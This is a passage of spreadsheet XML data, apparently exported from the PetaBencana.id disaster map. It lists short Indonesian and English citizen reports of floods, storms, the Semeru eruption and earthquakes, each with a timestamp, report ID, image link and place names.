    <t>Banjir di Sintang, Kalimantan Barat kurang lebih 2 Minggu ini banjir besar. Bahkan yang rumah di tepi sungai sudah mencapai ketinggian 2m</t>
  </si>
  <si>
    <t>16:16:47.054</t>
  </si>
  <si>
    <t>713b0bf6-0256-422a-8e87-0d17376814d0</t>
  </si>
  <si>
    <t>https://images.petabencana.id/713b0bf6-0256-422a-8e87-0d17376814d0.jpg</t>
  </si>
  <si>
    <t>Banjir slm 3 pekan, toko bnyk tutup, banyak krang sulit pangan, minim sembako, sulit air bersih, listrik padam #gotongroyongdigitalAgusRiyaf</t>
  </si>
  <si>
    <t>05:49:57.176</t>
  </si>
  <si>
    <t>fb9c2d9c-3a91-4404-8b82-ca0f450c1338</t>
  </si>
  <si>
    <t>https://images.petabencana.id/fb9c2d9c-3a91-4404-8b82-ca0f450c1338.jpg</t>
  </si>
  <si>
    <t>Dua minggu sudah area @pajaksintang  terendam banjir. Curah hujan yang tinggi membuat banjir di Kota Sintang tak kunjung surut."</t>
  </si>
  <si>
    <t>Tanjung Puri</t>
  </si>
  <si>
    <t>20:15:45.939</t>
  </si>
  <si>
    <t>3721b298-d316-4e61-adcd-bcc32247bb9d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/3721b298-d316-4e61-adcd-bcc32247bb9d.jpg</t>
  </si>
  <si>
    <t>Evakuasi warga yang terdampak banjir</t>
  </si>
  <si>
    <t>03:02:30.903</t>
  </si>
  <si>
    <t>82e203f7-e2b4-4f8d-a36e-b344d2f6aaef</t>
  </si>
  <si>
    <t>https://images.petabencana.id/82e203f7-e2b4-4f8d-a36e-b344d2f6aaef.jpg</t>
  </si>
  <si>
    <t>Kab Sintang sangat butuh bantuan. akses jalan sulit, air dan makanan menipis. sudah berhari hari..</t>
  </si>
  <si>
    <t>18:42:56.146</t>
  </si>
  <si>
    <t>652e54f6-7d91-4727-a353-a6b9d2e514bb</t>
  </si>
  <si>
    <t>https://images.petabencana.id/652e54f6-7d91-4727-a353-a6b9d2e514bb.jpg</t>
  </si>
  <si>
    <t>Saat ini Kota Sintang sedang terendam banjir. Dan akses jalan mulai terputus. Mohon bantuan saudara/i untuk bantu support doa ataupun donasi</t>
  </si>
  <si>
    <t>17:18:15.892</t>
  </si>
  <si>
    <t>2561cb96-7fc0-46bf-99c9-a8893f5bd691</t>
  </si>
  <si>
    <t>https://images.petabencana.id/2561cb96-7fc0-46bf-99c9-a8893f5bd691.jpg</t>
  </si>
  <si>
    <t>Telah terjadi Banjir besar di Sintang Kalimantan Barat. Menenggelamkan banyak rumah, memutus akses jalan serta banyak warga yg mengungsi</t>
  </si>
  <si>
    <t>11:55:14.059</t>
  </si>
  <si>
    <t>6bb82181-7cd0-4044-93df-8123006b3f29</t>
  </si>
  <si>
    <t>https://images.petabencana.id/6bb82181-7cd0-4044-93df-8123006b3f29.jpg</t>
  </si>
  <si>
    <t>11:53:10.916</t>
  </si>
  <si>
    <t>2f03d0c3-8b60-4775-9f3b-7ab1c5d5b33c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/2f03d0c3-8b60-4775-9f3b-7ab1c5d5b33c.jpg</t>
  </si>
  <si>
    <t>06:52:48.898</t>
  </si>
  <si>
    <t>3e684f7e-4af5-42f1-b75d-90f8717533f0</t>
  </si>
  <si>
    <t>Banjir biasanya terjadi 1-3 tahun sekali dengan ketinggian antara 20- 60 cm dan sudah ada pendalaman sungai yang dilakulan oleh pemerintah</t>
  </si>
  <si>
    <t>Pasar Pandan Air Mati</t>
  </si>
  <si>
    <t>Tanjung Harapan</t>
  </si>
  <si>
    <t>11:48:23.801</t>
  </si>
  <si>
    <t>09941474-16fd-4213-b713-e00a2d0c55a9</t>
  </si>
  <si>
    <t>https://images.petabencana.id/09941474-16fd-4213-b713-e00a2d0c55a9.jpg</t>
  </si>
  <si>
    <t>banjir hingga masuk rumah</t>
  </si>
  <si>
    <t>09:41:44.876</t>
  </si>
  <si>
    <t>60971e4c-1e6b-4e86-a0a6-45254a3c9729</t>
  </si>
  <si>
    <t>https://images.petabencana.id/60971e4c-1e6b-4e86-a0a6-45254a3c9729.jpg</t>
  </si>
  <si>
    <t>17 juni 2021 banjir wilayah Kawasan Industri Benua Permai Lestari (Olek) luapan dari sudirman indah, sungai cipayaeun &amp; sungai cimanceuri</t>
  </si>
  <si>
    <t>Cisereh</t>
  </si>
  <si>
    <t>Tigaraksa</t>
  </si>
  <si>
    <t>08:53:12.005</t>
  </si>
  <si>
    <t>437a7596-d7b1-4800-9727-3350427a0599</t>
  </si>
  <si>
    <t>https://images.petabencana.id/437a7596-d7b1-4800-9727-3350427a0599.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 13, "report_type": "flood" }</t>
  </si>
  <si>
    <t>31 Oktober 2021, Jalan Citeras-Tigaraksa terendam banjir karena dinding Saluran pada longsor dan mampet Dari Polsek Tigaraksa - Smk Korpri"</t>
  </si>
  <si>
    <t>09:20:12.451</t>
  </si>
  <si>
    <t>d1402dc2-893b-47a9-befb-cc6d3050494b</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d1402dc2-893b-47a9-befb-cc6d3050494b.jpg</t>
  </si>
  <si>
    <t>Banjir memendam perumahan mustika tigaraksa pada 11 Agustus 2021, akibat hujan deras dan luapan sungai cimanceuri dari bogor jawa barat</t>
  </si>
  <si>
    <t>Mata Gara</t>
  </si>
  <si>
    <t>09:26:48.337</t>
  </si>
  <si>
    <t>9a64ac87-b833-421c-aca7-d75106b83fb8</t>
  </si>
  <si>
    <t>https://images.petabencana.id/9a64ac87-b833-421c-aca7-d75106b83fb8.jpg</t>
  </si>
  <si>
    <t>Banjir yang menyebabkan runtuh nya pagar halaman warga di RT 001 RW 05 Kelurahan Cipadu Kecamatan Larangan Kota Tangerang</t>
  </si>
  <si>
    <t>Cipadu</t>
  </si>
  <si>
    <t>08:36:58.188</t>
  </si>
  <si>
    <t>31d0d729-8a2e-4847-be2d-925cd75a4b1b</t>
  </si>
  <si>
    <t>https://images.petabencana.id/31d0d729-8a2e-4847-be2d-925cd75a4b1b.jpg</t>
  </si>
  <si>
    <t>Minggu, 31 Oktober 2021 pada pukul 14:59 banjir mulai terjadi dan mulai surut pada pukul 17:58, tepatnya di perumahan puri permai tigaraksa</t>
  </si>
  <si>
    <t>Pasir Nangka</t>
  </si>
  <si>
    <t>13:58:27.379</t>
  </si>
  <si>
    <t>4726f4af-67e2-4456-aa04-f7e75a17da21</t>
  </si>
  <si>
    <t>Banjir di depan STAN Bintaro Sektor 3A</t>
  </si>
  <si>
    <t>Pondok Karya</t>
  </si>
  <si>
    <t>09:04:24.142</t>
  </si>
  <si>
    <t>126b3971-868f-4f1d-879f-01ca09017d6f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/126b3971-868f-4f1d-879f-01ca09017d6f.jpg</t>
  </si>
  <si>
    <t>Bintaro banjir. Dua jam nungguin ujan berenti. Sekalinya berenti langsung banjir. Sendal hanyut pas nerobos banjir.</t>
  </si>
  <si>
    <t>10:55:22.090</t>
  </si>
  <si>
    <t>1d4b0bca-3f21-44f8-80bc-9fb43b8f88fc</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1d4b0bca-3f21-44f8-80bc-9fb43b8f88fc.jpg</t>
  </si>
  <si>
    <t>07:29:10.234</t>
  </si>
  <si>
    <t>24acfd7f-8920-4b1d-93b1-7b6d0b2b9550</t>
  </si>
  <si>
    <t>https://images.petabencana.id/24acfd7f-8920-4b1d-93b1-7b6d0b2b9550.jpg</t>
  </si>
  <si>
    <t>Akibat angin ribut mengakibatkan pohon tumbang di halam sekolah SD negeri manggong ,ngadirejo,temanggung,jawa tengah ..aktivitas pelajaran t</t>
  </si>
  <si>
    <t>Manggong</t>
  </si>
  <si>
    <t>03:13:05.993</t>
  </si>
  <si>
    <t>9d011084-229c-445f-8af1-b68b16901797</t>
  </si>
  <si>
    <t>https://images.petabencana.id/9d011084-229c-445f-8af1-b68b16901797.jpg</t>
  </si>
  <si>
    <t>Hujan di sertai angin kencang menyebabkan pohon tumbang mrnutup jalan raya jumo dan merusak jaringan listrik dan telekomunikasi</t>
  </si>
  <si>
    <t>Padureso</t>
  </si>
  <si>
    <t>Jumo</t>
  </si>
  <si>
    <t>16:08:40.696</t>
  </si>
  <si>
    <t>6d0354c1-d481-439a-af73-de4232e64606</t>
  </si>
  <si>
    <t>https://images.petabencana.id/6d0354c1-d481-439a-af73-de4232e64606.jpg</t>
  </si>
  <si>
    <t>Angin ribut terjadi di kaloran temanggung pada hari rabu 1 desember 2021 pohon tumbang mengenai atap gedung sekolah dasar rusak sedang</t>
  </si>
  <si>
    <t>00:08:24.903</t>
  </si>
  <si>
    <t>5911dfdc-c2d1-4939-b1a3-628a5b9a9446</t>
  </si>
  <si>
    <t>https://images.petabencana.id/5911dfdc-c2d1-4939-b1a3-628a5b9a9446.jpg</t>
  </si>
  <si>
    <t>Banjir di Desa Penyang, dengan ketinggian selutut orang dewasa hingga kini belum surut, #(GotongRoyongDigital Simulasi (Dedi Susanto)"""</t>
  </si>
  <si>
    <t>Penyang</t>
  </si>
  <si>
    <t>Telawang</t>
  </si>
  <si>
    <t>01:51:13.380</t>
  </si>
  <si>
    <t>519addf2-3261-4a0e-8a92-828b0c0e73cd</t>
  </si>
  <si>
    <t>https://images.petabencana.id/519addf2-3261-4a0e-8a92-828b0c0e73cd.jpg</t>
  </si>
  <si>
    <t>Desa Tarangan Rt.03 Kec.paringin selatan</t>
  </si>
  <si>
    <t>Kusambi Hulu</t>
  </si>
  <si>
    <t>Lampihong</t>
  </si>
  <si>
    <t>07:24:03.319</t>
  </si>
  <si>
    <t>e985cbd9-879b-4f25-9c10-de89cd1ddabe</t>
  </si>
  <si>
    <t>https://images.petabencana.id/e985cbd9-879b-4f25-9c10-de89cd1ddabe.jpg</t>
  </si>
  <si>
    <t>Curah hujan yang cukup tinggi di hulu ke hilir mengakibatkan sungai cikeruh meluap serta membuat tanggul.jebol di rancaekek #gotongroyong*"</t>
  </si>
  <si>
    <t>09:49:19.559</t>
  </si>
  <si>
    <t>7375d2f7-627f-42b3-aec3-3a5e9c606021</t>
  </si>
  <si>
    <t>https://images.petabencana.id/7375d2f7-627f-42b3-aec3-3a5e9c606021.jpg</t>
  </si>
  <si>
    <t>Angin puting beliung terjadi di wil kec parakan kab temanggung pukul 16.10 WIB terjadi di beberapa titik. Dampak atap rumah rusak</t>
  </si>
  <si>
    <t>Wanutengah</t>
  </si>
  <si>
    <t>Parakan</t>
  </si>
  <si>
    <t>TRC BPBD"</t>
  </si>
  <si>
    <t>Petirejo</t>
  </si>
  <si>
    <t>09:58:32.130</t>
  </si>
  <si>
    <t>f55f6bb4-89b5-4cf8-92f5-21948ae00b0a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/f55f6bb4-89b5-4cf8-92f5-21948ae00b0a.jpg</t>
  </si>
  <si>
    <t>Angin puting beliung pohon tumbang menimpa gedung sekolah dasar negeri kaloran kab temanggung. TRC BPBD Temanggung"</t>
  </si>
  <si>
    <t>08:17:53.138</t>
  </si>
  <si>
    <t>3189b19d-601a-4257-ba5d-b31646986342</t>
  </si>
  <si>
    <t>https://images.petabencana.id/3189b19d-601a-4257-ba5d-b31646986342.jpg</t>
  </si>
  <si>
    <t>Di Indragiri Hilir, Tembilahan, Riau tepatnya dijalan sederhana selalu banjir dalam tetapi dijalan lain juga banjir, mohon bantuannya­ƒÖÅ Thx</t>
  </si>
  <si>
    <t>Tembilahan Hulu</t>
  </si>
  <si>
    <t>Indragiri Hilir</t>
  </si>
  <si>
    <t>04:32:49.297</t>
  </si>
  <si>
    <t>b4ded022-31b6-4f72-a9da-d43d73ce56f8</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b4ded022-31b6-4f72-a9da-d43d73ce56f8.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 138, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Kejadian bencana banjir : Hari/tanggal : jumat 03 des 2021 Desa : sepaso selatan Kec. Bengalon Kab. Kutai timur Kaltim #GotongroyongDigital"</t>
  </si>
  <si>
    <t>Muara Bengalon</t>
  </si>
  <si>
    <t>Bengalon</t>
  </si>
  <si>
    <t>09:05:13.831</t>
  </si>
  <si>
    <t>a3b9cce4-8ea4-4bdd-9f9a-00c977c9d229</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a3b9cce4-8ea4-4bdd-9f9a-00c977c9d229.jpg</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": "3137", "instance_region_code": "ID-JT" }</t>
  </si>
  <si>
    <t>Daerah semarang bonarjo, pelabuhan, kaligawe dan sekitarnya</t>
  </si>
  <si>
    <t>Tanjungmas</t>
  </si>
  <si>
    <t>11:01:20.541</t>
  </si>
  <si>
    <t>e00a58b4-99e6-4d01-9818-633dcade7732</t>
  </si>
  <si>
    <t>https://images.petabencana.id/e00a58b4-99e6-4d01-9818-633dcade7732.jpg</t>
  </si>
  <si>
    <t>Awan panas gunung semeru,lumajang jawa timur</t>
  </si>
  <si>
    <t>11:11:48.622</t>
  </si>
  <si>
    <t>6d3ba5d6-5320-4d3c-b9e8-412388074e86</t>
  </si>
  <si>
    <t>https://images.petabencana.id/6d3ba5d6-5320-4d3c-b9e8-412388074e86.jpg</t>
  </si>
  <si>
    <t>{ "points": 2, "report_type": "volcano", "volcanicSigns": [ 4 ], "evacuationArea": true, "evacuationNumber": 2 }</t>
  </si>
  <si>
    <t>#gunungberapi</t>
  </si>
  <si>
    <t>11:13:23.635</t>
  </si>
  <si>
    <t>0111294b-75da-4a86-bae3-be31f37eb4d1</t>
  </si>
  <si>
    <t>{ "points": 2, "report_type": "volcano", "volcanicSigns": [ 0, 4 ], "evacuationArea": false, "evacuationNumber": 1 }</t>
  </si>
  <si>
    <t>gelap</t>
  </si>
  <si>
    <t>11:18:11.670</t>
  </si>
  <si>
    <t>79291e93-2126-41c5-bd42-f4f1ab1d1777</t>
  </si>
  <si>
    <t>https://images.petabencana.id/79291e93-2126-41c5-bd42-f4f1ab1d1777.jpg</t>
  </si>
  <si>
    <t>Bencana hujan</t>
  </si>
  <si>
    <t>Cot Ba'U</t>
  </si>
  <si>
    <t>Sabang</t>
  </si>
  <si>
    <t>11:09:10.845</t>
  </si>
  <si>
    <t>c4bc9370-5ad8-4c8e-aab0-6401adbeeee5</t>
  </si>
  <si>
    <t>Gunung Semeru meletus pada 4 Des 2021, menyebabkan awan panas, hujan abu dan banjir lahar, tetap waspada dan hati-hati</t>
  </si>
  <si>
    <t>01:33:23.882</t>
  </si>
  <si>
    <t>d51d0c2f-623b-4c38-b3ca-3013560951ef</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d51d0c2f-623b-4c38-b3ca-3013560951ef.jpg</t>
  </si>
  <si>
    <t>BTN Pondok Indah Sesela Gunung Sari. Untuk diluar BTN ketinggian air sudah mencapai leher  orang dewasa.</t>
  </si>
  <si>
    <t>Rembiga</t>
  </si>
  <si>
    <t>Selaparang</t>
  </si>
  <si>
    <t>04:49:31.197</t>
  </si>
  <si>
    <t>65097655-11c0-4318-84e7-986a94a3df93</t>
  </si>
  <si>
    <t>https://images.petabencana.id/65097655-11c0-4318-84e7-986a94a3df93.jpg</t>
  </si>
  <si>
    <t>Banjir di desa palingkau</t>
  </si>
  <si>
    <t>Antar Raya</t>
  </si>
  <si>
    <t>10:20:13.579</t>
  </si>
  <si>
    <t>f2aad7ec-faec-4e98-aa12-2febc0baef9b</t>
  </si>
  <si>
    <t>Heavy rains causing flooding.</t>
  </si>
  <si>
    <t>14:01:27.218</t>
  </si>
  <si>
    <t>4cbb6bfa-d535-4859-bc6f-1c16279477db</t>
  </si>
  <si>
    <t>https://images.petabencana.id/4cbb6bfa-d535-4859-bc6f-1c16279477db.jpg</t>
  </si>
  <si>
    <t>Tidung</t>
  </si>
  <si>
    <t>Rappocini</t>
  </si>
  <si>
    <t>02:15:44.313</t>
  </si>
  <si>
    <t>7620207e-98e7-44fb-ac18-f49608e9e192</t>
  </si>
  <si>
    <t>https://images.petabencana.id/7620207e-98e7-44fb-ac18-f49608e9e192.jpg</t>
  </si>
  <si>
    <t>Lokasi di PMI Kab. Maros masih terpantau aman</t>
  </si>
  <si>
    <t>Pettuadae</t>
  </si>
  <si>
    <t>Turikale</t>
  </si>
  <si>
    <t>03:03:25.556</t>
  </si>
  <si>
    <t>68c53be0-2214-4978-b8db-38493c5ad86b</t>
  </si>
  <si>
    <t>https://images.petabencana.id/68c53be0-2214-4978-b8db-38493c5ad86b.jpg</t>
  </si>
  <si>
    <t>Banjir sekitar jembatan kembar Pangkep</t>
  </si>
  <si>
    <t>Mappasaile</t>
  </si>
  <si>
    <t>Pangkajene</t>
  </si>
  <si>
    <t>Pangkajene Dan Kepulauan</t>
  </si>
  <si>
    <t>04:37:03.970</t>
  </si>
  <si>
    <t>c56fc89a-e093-4964-b306-eb659f21cac5</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c56fc89a-e093-4964-b306-eb659f21cac5.jpg</t>
  </si>
  <si>
    <t>Danau depan unhas meluap ke jalanan</t>
  </si>
  <si>
    <t>04:39:43.161</t>
  </si>
  <si>
    <t>6f784071-8e93-4f1e-86b1-60daf416dbe1</t>
  </si>
  <si>
    <t>https://images.petabencana.id/6f784071-8e93-4f1e-86b1-60daf416dbe1.jpg</t>
  </si>
  <si>
    <t>Urip depan kantor gubernur, waspada yg ingin melintas. (07.34)</t>
  </si>
  <si>
    <t>Karampuang</t>
  </si>
  <si>
    <t>04:51:09.644</t>
  </si>
  <si>
    <t>d4e2d0ea-c884-4a34-9a50-2743975fdaf8</t>
  </si>
  <si>
    <t>Sudah beberapa rumah tergenang air dgn ketinggian bervariasi.. Mulai 30 - 70 cm</t>
  </si>
  <si>
    <t>04:58:03.209</t>
  </si>
  <si>
    <t>4c8a8278-e62d-4240-a819-6bb987c21baf</t>
  </si>
  <si>
    <t>Rumah, empang dan sawah yg tergenang air</t>
  </si>
  <si>
    <t>Tunikamaseang</t>
  </si>
  <si>
    <t>Bontoa</t>
  </si>
  <si>
    <t>05:09:39.033</t>
  </si>
  <si>
    <t>5a100d1c-b6b3-4f02-8751-733d63c53d53</t>
  </si>
  <si>
    <t>https://images.petabencana.id/5a100d1c-b6b3-4f02-8751-733d63c53d53.jpg</t>
  </si>
  <si>
    <t>Tinggi air sekitar 100cm</t>
  </si>
  <si>
    <t>Paccerakang</t>
  </si>
  <si>
    <t>05:44:28.135</t>
  </si>
  <si>
    <t>73927e98-3737-4e64-91a6-bab0101dc227</t>
  </si>
  <si>
    <t>https://images.petabencana.id/73927e98-3737-4e64-91a6-bab0101dc227.jpg</t>
  </si>
  <si>
    <t>Tanah longsor dan banjir bandang</t>
  </si>
  <si>
    <t>Batu Layar Barat</t>
  </si>
  <si>
    <t>Batu Layar</t>
  </si>
  <si>
    <t>06:46:44.868</t>
  </si>
  <si>
    <t>2440f4b7-ee56-49c8-ae6b-897e42345b1e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/2440f4b7-ee56-49c8-ae6b-897e42345b1e.jpg</t>
  </si>
  <si>
    <t>Jl yusuf bauty, warga mulai mengungsi</t>
  </si>
  <si>
    <t>Paccinongan</t>
  </si>
  <si>
    <t>09:51:22.455</t>
  </si>
  <si>
    <t>21714fb3-e26f-490b-89ec-3fb505f6f575</t>
  </si>
  <si>
    <t>https://images.petabencana.id/21714fb3-e26f-490b-89ec-3fb505f6f575.jpg</t>
  </si>
  <si>
    <t>Banjir di bantabantaeng lingkungan. Panaikang Kelurahan Pallantikang Kec. Maros Baru</t>
  </si>
  <si>
    <t>Pallantikang</t>
  </si>
  <si>
    <t>Maros Baru</t>
  </si>
  <si>
    <t>10:59:35.028</t>
  </si>
  <si>
    <t>98332ecd-36f6-49a1-a78d-8c2345ed61e0</t>
  </si>
  <si>
    <t>banjir di koba</t>
  </si>
  <si>
    <t>Arung Dalam</t>
  </si>
  <si>
    <t>Koba</t>
  </si>
  <si>
    <t>Bangka Tengah</t>
  </si>
  <si>
    <t>06:00:04.498</t>
  </si>
  <si>
    <t>858ae220-0160-4c32-bd95-64a3296f7751</t>
  </si>
  <si>
    <t>https://images.petabencana.id/858ae220-0160-4c32-bd95-64a3296f7751.jpg</t>
  </si>
  <si>
    <t>Banjir di jalan MT Hariyono ketinggian air 40 cm dimohon berhati hati jika melewati jln tersebut</t>
  </si>
  <si>
    <t>08:34:01.838</t>
  </si>
  <si>
    <t>bb1db80e-6aa4-40ee-a536-c0ff539d3761</t>
  </si>
  <si>
    <t>https://images.petabencana.id/bb1db80e-6aa4-40ee-a536-c0ff539d3761.jpg</t>
  </si>
  <si>
    <t>Membersihkan sampah</t>
  </si>
  <si>
    <t>Kambu</t>
  </si>
  <si>
    <t>Kendari</t>
  </si>
  <si>
    <t>11:28:32.276</t>
  </si>
  <si>
    <t>dc65aef2-152a-44d8-a4ae-ee4d7334e7a3</t>
  </si>
  <si>
    <t>https://images.petabencana.id/dc65aef2-152a-44d8-a4ae-ee4d7334e7a3.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "volcano", "volcanicSigns": [ 0, 3, 4 ], "evacuationNumber": 3, "evacuationArea": true }</t>
  </si>
  <si>
    <t>Merapi 2021 cr by owner</t>
  </si>
  <si>
    <t>Pakem Binangun</t>
  </si>
  <si>
    <t>01:32:24.732</t>
  </si>
  <si>
    <t>931837fd-e28f-47ff-a1fb-3897aeaa32ed</t>
  </si>
  <si>
    <t>https://images.petabencana.id/931837fd-e28f-47ff-a1fb-3897aeaa32ed.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "report_type": "volcano", "volcanicSigns": [ 4 ], "evacuationArea": true, "evacuationNumber": 2 }</t>
  </si>
  <si>
    <t>Proses pencarian korban erupsi G. Semeru di Dusun Curah Kobokan,Candipuro Lumajang. (Isrianto Islamudin Relawan Kebakkramat Karanganyar)"</t>
  </si>
  <si>
    <t>Supiturang</t>
  </si>
  <si>
    <t>Pronojiwo</t>
  </si>
  <si>
    <t>Lumajang</t>
  </si>
  <si>
    <t>12:23:19.093</t>
  </si>
  <si>
    <t>b1580f1b-63a5-4878-8df8-dc6065520063</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b1580f1b-63a5-4878-8df8-dc6065520063.jpg</t>
  </si>
  <si>
    <t>Banjir tdi maghrib</t>
  </si>
  <si>
    <t>Negeri Katon</t>
  </si>
  <si>
    <t>Pesawaran</t>
  </si>
  <si>
    <t>03:05:10.000</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/362797</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/data/media/thumbs-pasangmata/2021/12/13/362797-1639364710914679398.mp4-03.jpg</t>
  </si>
  <si>
    <t>Melihat Aktitivitas 'Pahlawan Kali' di Epicentrum Kuningan</t>
  </si>
  <si>
    <t>Petugas kebersihan sedang membersihkan kali yang berada di tengah kawasan Epicentrum, Rasuna Said.</t>
  </si>
  <si>
    <t>15:05:37.408</t>
  </si>
  <si>
    <t>6fc6c4f4-2418-4f52-b6d8-63e5ca170bcc</t>
  </si>
  <si>
    <t>Banjir karena hujan tidak berhenti sehari semalam sehingga saluran air penuh, selain itu tersendat dan mkarena sampah yang ada disaluran air</t>
  </si>
  <si>
    <t>Cibiru Wetan</t>
  </si>
  <si>
    <t>15:11:00.839</t>
  </si>
  <si>
    <t>1f424877-b77a-4434-a388-dcbd4cb311a0</t>
  </si>
  <si>
    <t>Banjir disebabkan hujan seharian sehingga air meluap dari genangan air yang tersumbat karena adanya sampah #Youth4GotongRoyongSyalaisha4DKRB</t>
  </si>
  <si>
    <t>03:36:13.142</t>
  </si>
  <si>
    <t>bdddc8ac-8163-43a5-b072-f5045eb0b97a</t>
  </si>
  <si>
    <t>terasa bgt gempa</t>
  </si>
  <si>
    <t>Bonto Makkio</t>
  </si>
  <si>
    <t>03:56:47.316</t>
  </si>
  <si>
    <t>88be91df-a8c4-4d16-9465-434d3149c383</t>
  </si>
  <si>
    <t>felt an earthquake</t>
  </si>
  <si>
    <t>Komodo</t>
  </si>
  <si>
    <t>Manggarai Barat</t>
  </si>
  <si>
    <t>04:14:09.751</t>
  </si>
  <si>
    <t>6fcf40ef-6baf-4770-873b-53e93190f948</t>
  </si>
  <si>
    <t>https://images.petabencana.id/6fcf40ef-6baf-4770-873b-53e93190f948.jpg</t>
  </si>
  <si>
    <t>gempa di takalar, warga berkumpul di titik aman</t>
  </si>
  <si>
    <t>Bajeng</t>
  </si>
  <si>
    <t>Pattallassang</t>
  </si>
  <si>
    <t>Takalar</t>
  </si>
  <si>
    <t>04:40:17.787</t>
  </si>
  <si>
    <t>05a78d4a-4bc9-41f1-ac2b-e4316151c628</t>
  </si>
  <si>
    <t>https://images.petabencana.id/05a78d4a-4bc9-41f1-ac2b-e4316151c628.jpg</t>
  </si>
  <si>
    <t>Kondisi pasien dan keluarga pasien di luar RS Anwar pasca gempa 10 menit yang lalu</t>
  </si>
  <si>
    <t>10:09:02.325</t>
  </si>
  <si>
    <t>352a81dc-aae0-490a-bb48-0a18b64dd507</t>
  </si>
  <si>
    <t>https://images.petabencana.id/352a81dc-aae0-490a-bb48-0a18b64dd507.jpg</t>
  </si>
  <si>
    <t>Telah terjadi gempa yang mengakibatkan kerusakan bangunan di kecamatan pasimarannu</t>
  </si>
  <si>
    <t>Bonea</t>
  </si>
  <si>
    <t>Pasimarannu</t>
  </si>
  <si>
    <t>Kepulauan Selayar</t>
  </si>
  <si>
    <t>07:03:28.627</t>
  </si>
  <si>
    <t>bd2880f5-a5c8-4125-81a0-a4f716f4b862</t>
  </si>
  <si>
    <t>https://images.petabencana.id/bd2880f5-a5c8-4125-81a0-a4f716f4b862.jpg</t>
  </si>
  <si>
    <t>{ "points": 2, "flood_depth": 25, "report_type": "flood" }</t>
  </si>
  <si>
    <t>07:09:30.020</t>
  </si>
  <si>
    <t>a1f34e98-2a0c-486c-8269-a007cf1a54e2</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a1f34e98-2a0c-486c-8269-a007cf1a54e2.jpg</t>
  </si>
  <si>
    <t>Banjir di Desa Melayu Ulu Kecamatan Martapura Timur, Ketinggian air bervariatif 10-20 cm</t>
  </si>
  <si>
    <t>07:12:04.311</t>
  </si>
  <si>
    <t>a7c1bc35-48ad-4a83-9ed7-91ec77996da5</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a7c1bc35-48ad-4a83-9ed7-91ec77996da5.jpg</t>
  </si>
  <si>
    <t>07:17:08.465</t>
  </si>
  <si>
    <t>2d461ee3-8bd9-46cf-aba5-cad1e3a8e374</t>
  </si>
  <si>
    <t>https://images.petabencana.id/2d461ee3-8bd9-46cf-aba5-cad1e3a8e374.jpg</t>
  </si>
  <si>
    <t>07:17:56.887</t>
  </si>
  <si>
    <t>3dcdf27c-a38f-4a32-8d28-93ecdb42f27d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/3dcdf27c-a38f-4a32-8d28-93ecdb42f27d.jpg</t>
  </si>
  <si>
    <t>Banjir di Desa Melayu Ilir Kec. Martapura Timur Kabupaten Banjar. Jalan yang terendam +/- 300m dengan ketinggian +/- 10-40 cm</t>
  </si>
  <si>
    <t>07:22:45.493</t>
  </si>
  <si>
    <t>6d4f6f15-12df-4a7a-932f-15e4f9be741c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/6d4f6f15-12df-4a7a-932f-15e4f9be741c.jpg</t>
  </si>
  <si>
    <t>07:28:17.465</t>
  </si>
  <si>
    <t>79fc8cf6-f0ba-44da-925a-5bde5649dbe0</t>
  </si>
  <si>
    <t>https://images.petabencana.id/79fc8cf6-f0ba-44da-925a-5bde5649dbe0.jpg</t>
  </si>
  <si>
    <t>Floods hit again in the West Lombok area, Indonesia, the rain started to reach the highest point of rainfall this year for Lombok and its su</t>
  </si>
  <si>
    <t>Jati Sela</t>
  </si>
  <si>
    <t>07:24:27.520</t>
  </si>
  <si>
    <t>7e02ec11-db2a-48d8-af30-f118f41733ab</t>
  </si>
  <si>
    <t>https://images.petabencana.id/7e02ec11-db2a-48d8-af30-f118f41733ab.jpg</t>
  </si>
  <si>
    <t>Sungai Tabuk Kota</t>
  </si>
  <si>
    <t>07:25:08.154</t>
  </si>
  <si>
    <t>c99464e2-ecac-407d-9d44-68425eb51eac</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c99464e2-ecac-407d-9d44-68425eb51eac.jpg</t>
  </si>
  <si>
    <t>Desa Pakauman Ulu Kecamatan Martapura Timur, ketinggian air 20 cm panjang jalan yang terendam +/- 50 cm</t>
  </si>
  <si>
    <t>07:31:19.555</t>
  </si>
  <si>
    <t>9b67cc0b-9654-4912-8d6d-691767d9ace0</t>
  </si>
  <si>
    <t>https://images.petabencana.id/9b67cc0b-9654-4912-8d6d-691767d9ace0.jpg</t>
  </si>
  <si>
    <t>Banjir Di Desa Pakauman Kec. Martapura Timur Kab. Banjar. Ketinggian air 33 cm, rumah yang terdampak +/- 50 buah rumah</t>
  </si>
  <si>
    <t>07:37:35.104</t>
  </si>
  <si>
    <t>40af7566-a85e-4f99-a9e0-1d35170afafc</t>
  </si>
  <si>
    <t>https://images.petabencana.id/40af7566-a85e-4f99-a9e0-1d35170afafc.jpg</t>
  </si>
  <si>
    <t>Banjir di Desa Dalam Pagar Ulu Kec. Martapura Timur Kab.Banjar. +/- 20 buah rumah yang terdampak dengan ketinggian 20 cm. Dijalan 10-40 cm.</t>
  </si>
  <si>
    <t>07:41:09.387</t>
  </si>
  <si>
    <t>8f09bc6c-b052-4fda-b05a-2bfbf53e4e5b</t>
  </si>
  <si>
    <t>https://images.petabencana.id/8f09bc6c-b052-4fda-b05a-2bfbf53e4e5b.jpg</t>
